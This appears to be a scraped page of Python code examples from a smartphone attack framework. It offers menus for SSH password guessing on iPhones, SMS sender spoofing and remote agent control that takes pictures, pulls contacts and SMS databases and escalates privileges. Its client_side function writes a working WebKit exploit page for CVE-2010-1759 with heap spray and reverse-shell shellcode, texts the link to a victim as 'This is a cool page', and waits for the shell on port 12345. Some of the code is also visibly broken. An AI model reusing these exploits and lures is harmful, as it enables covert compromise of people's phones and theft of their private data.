Exemplo n.º 1
0
def remote_menu():

    menu_list = ['Direct Download Agent',
                 'Client Side Shell',
                 'USSD Webpage Attack (Safe)',
                 'USSD Webpage Attack (Malicious)'
                ]

    choice = menu(menu_list, '[*] Choose an Attack to Launch:\n')

    if choice is 0:
        return_code = 0

    elif choice is 1:
        return_code = direct_download()

    elif choice is 2:
        return_code = client_side()

    elif choice is 3:
        return_code = ussd()

    elif choice is 4:
        return_code = ussd()

#    elif choice is my_number:
#        return_code = custom_module()
# etc...

    else:
        return_code = 1

    return return_code
Exemplo n.º 2
0
def iphone_menu():

    menu_list = ['Test for Default SSH Password (iPhone)',
                 'Guess SSH Password (iPhone)',
                 'Spoof Sender Address SMS (iPhone)'
                ]

    choice = menu(menu_list, '[*] Choose a Remote Attack to Launch:\n')

    if choice is 0:
        return_code = 0

    elif choice is 1:
        return_code = alpine()

    elif choice is 2:
        return_code = guess_pass()

    elif choice is 3:
        return_code = sms_sender_spoof()

#    elif choice is my_number:
#        return_code = custom_module()
# etc...

    else:
        return_code = 1

    return return_code
Exemplo n.º 3
0
def agentcontrol_menu(key=None):
    if key == None:
        key = raw_input(color(33, '\n[-] Enter agent control key [None]: '))

        try:
            key = key.lower()
        except:
            pass

        if key in ('', 'none', '\n', None):
            key = None

    if key == None:
        print color(31, '[!] No key was provided, communicating with an agent will not work')
        print color(31, '[!] Returning...')
        return 1

    menu_list = ['Send SMS'            ,
                 'Take Picture'        ,
                 'Get Contacts'        ,
                 'Get SMS Database'    ,
                 'Privilege Escalation'
                ]

    choice = menu(menu_list, color(35, '\n[*] Agent Control Commands:\n'))

    if choice is 0:
        return_code = 0

    elif choice is 1:
        return_code = send_sms(key)

    elif choice is 2:
        return_code = take_picture(key)

    elif choice is 3:
        return_code = get_contacts(key)

    elif choice is 4:
        return_code = get_sms_database(key)

    elif choice is 5:
        return_code = privilege_escalation(key)

#    elif choice is my_number:
#        return_code = custom_module()
# etc...

    else:
        return_code = 1

    return return_code
def add_modem():
    # Adds a modem to the MySQL DB

    config  = ConfigParser.ConfigParser()
    config.read('config.cfg')

    webserver = config.get('Web', 'webroot')
    ipaddress = config.get('Web', 'ipaddress')

    modemlst = ['Search for attached modem',
                'Attach to a smartphone based app'
               ]
    x = 0

    choice = spf_core.menu(modemlst, color(35,'\nChoose a type of modem to attach to:\n'))

    if choice == 1:
        if os.path.exists('/dev/ttyUSB2'):
            print color(33,'[*] USB Modem Found\n')
            usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)

            line = read_modem(usb)
            print line

            usb.close()

            path      = '/zoom'
            number    = '/dev/ttyUSB2'
            key       = 'NULL'
            modemtype = "usb"

            x = make_files2(path)

            if x != 1:
                x = database_add2(number,path,key,modemtype)

        else:
            print color(31,'[!] No USB Modem Found')
            x = add_modem()

    elif choice == 2:
        try:
            x = app_connect(webserver)
        except Exception, e:
            print color(31,'[!] Error: %s' % e)
            x = 1
def client_side():
    # TODO: fix a lot
    webserver = config.get("Web", "server")
    # ipaddress      = config.get('Web', 'ipaddress')
    shellipaddress = config.get("Web", "shellipaddress")

    cs = ["CVE 2010-1759 Webkit Vuln Android"]

    choice = menu(cs)

    if choice in (0, "Error"):
        return 0

    elif choice == 1:
        path = str(raw_input(color(33, "[-] Hosting Path: ")))
        filename = str(raw_input(color(33, "[-] Filename: ")))
        ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
        number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))

        link = "http://%s%s%s" % (ipaddress, path, filename)

        fullpath = webserver + path
        command1 = "mkdir %s" % fullpath
        system(command1)

        octets = shellipaddress.split(".")

        out1 = struct.pack("b", int(octets[0]))
        hex1 = hex(out1)

        out2 = struct.pack("b", int(octets[1]))
        hex2 = hex(out2)

        out3 = struct.pack("b", int(octets[2]))
        hex3 = hex(out3)

        out4 = struct.pack("b", int(octets[3]))
        hex4 = hex(out4)

        sploitfile = "%s%s" % (fullpath, filename)
        command8 = "touch %s" % sploitfile
        system(command8)

        command9 = "chmod 777 %s" % sploitfile
        system(command9)

        file = open(sploitfile, "w")
        text = [
            "<html>\n",
            "<head>\n",
            "<script>\n",
            'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
            'var port = unescape("\\u3930");\n',
            "function trigger()\n",
            "{\n",
            'var span = document.createElement("div");\n',
            'document.getElementById("BodyID").appendChild(span);\n',
            'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
            "}\n",
            "function exploit()\n",
            "{\n",
            'var nop = unescape("\\u33bc\\u0057");\n',
            "do\n",
            "{\n",
            "nop+=nop;\n",
            "} while (nop.length<=0x1000);\n",
            'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
            "scode += port;\n",
            "scode += ip;\n",
            'scode += unescape("\\u2000\\u2000");\n',
            "target = new Array();\n",
            "for(i = 0; i < 0x1000; i++)\n",
            "target[i] = scode;\n",
            "for (i = 0; i <= 0x1000; i++)\n",
            "{\n",
            'document.write(target[i]+"<i>");\n',
            "if (i>0x999)\n",
            "{\n",
            "trigger();\n",
            "}\n",
            "}\n",
            "}\n",
            "</script>\n",
            "</head>\n",
            '<body id="BodyID">\n',
            "Enjoy!\n",
            "<script>\n",
            "exploit();\n",
            "</script>\n",
            "</body>\n",
            "</html>\n",
        ]
        file.writelines(text)
        file.close()

        modem = get_modem()
        if modem == 0:
            print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
            return 1

        # Read SQL vars from config
        sqlserver = config.get("SQL", "server")
        username = config.get("SQL", "username")
        password = config.get("SQL", "password")

        db = MySQLdb.connect(sqlserver, username, password, "framework")

        pathquery = "SELECT %s from modems where id=%s" % ("path", modem)
        path2 = db_exec_rows(pathquery)

        keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem)
        key2 = db_exec_rows(keyquery)

        modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem)
        modemtype2 = db_exec_rows(modemtypequery)

        if modemtype2 == "usb":
            # Interface with USB modem
            usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write("AT+CMGF=1\r\n")
            line = read_modem(usb)
            print line
            sleep(1)

            numberline = 'AT+CMGS="%s"\r\n' % number
            usb.write(numberline)
            line = read_modem(usb)
            print line
            sleep(1)

            msg = "This is a cool page: %s" % link
            usb.write(struct.pack("b", 26, msg))
            sleep(2)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.close()

        elif modemtype2 == "app":
            # Interface with app-based modem
            control = "%s%s/getfunc" % (webserver, path2)
            command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)

            file = open(control, "w")
            file.write(command2)
            file.close()

        vulnerable = "no"

        # socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((str(shellipaddress), 12345))

        if data_socket == socket.accept():
            data = "/system/bin/id\n"

            data_socket.write(data)
            data = data_socket()

            print data
            close(data_socket)

            vulnerable = "yes"
            print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)

            table = "client"
            global db

            number2 = '"%s"' % number
            vulnerable2 = '"%s"' % vulnerable
            webkit = '"webkit"'
            insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % (
                table,
                number2,
                webkit,
                vulnerable2,
            )
            cursor = db.cursor()
            sql = cursor.execute(insertquery)
        return 0

    return 1